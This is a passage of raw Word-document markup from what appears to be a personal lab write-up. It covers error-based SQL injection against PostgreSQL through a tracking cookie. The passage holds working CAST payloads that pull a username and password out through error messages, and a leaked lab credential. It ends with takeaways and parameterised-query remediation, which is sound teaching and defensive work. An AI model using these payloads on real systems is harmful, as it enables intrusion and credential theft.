          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">TrackingId='--  →  Comment fixes syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">AND 1=CAST((SELECT 1) AS int)--  →  Boolean CAST structure confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  → ERROR: invalid input syntax for type integer: "administrator"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  → ERROR: invalid input syntax for type integer: "x1xwhtmp9eee4virigad"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Login: administrator / x1xwhtmp9eee4virigad  →  Lab solved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7. BLIND VS VISIBLE ERROR-BASED COMPARISON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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Blind (Oracle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Visible (PostgreSQL)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channel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 status (500 vs 200)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 message body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Requests needed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720+ requests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Python script required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Burp Repeater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Oracle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 function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TO_CHAR(1/0)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CAST(value AS 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Slow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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">8. KEY TAKEAWAYS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verbose error messages are a critical misconfiguration — the full SQL query disclosed in the first error made exploitation trivial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CAST-based extraction is PostgreSQL-specific — type conversion errors leak actual data values in the error message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Character limits can break payloads — clearing TrackingId was necessary to fit the full payload; always check for truncation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT 1 is essential — subqueries in boolean expressions must return exactly one row; multiple rows produce a different unhelpful error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Visible error-based is faster than blind — entire values in one request vs hundreds; always try this first if error messages appear</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Comment characters are load-bearing — without -- the injected quote breaks query syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9. REMEDIATION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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Fix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Unsanitised cookie in SQL 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 parameterised queries — never concatenate user input into SQL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Verbose DB errors in response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Return generic error pages; log errors server-side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query disclosed in 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 expose internal query structure to end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row limit on subquery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Validate query structure; use stored procedures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure parameterised query (PostgreSQL):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM tracking WHERE id = '' + trackingId + '</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM tracking WHERE id = $1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Pass trackingId as parameter $1 — never concatenated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1A56A0" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Neelesh Pandey  |  github.com/Neelesh707  |  linkedin.com/in/neelesh-pandey021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2026-04-09T02:51:37.158Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-09T02:51:37.158Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>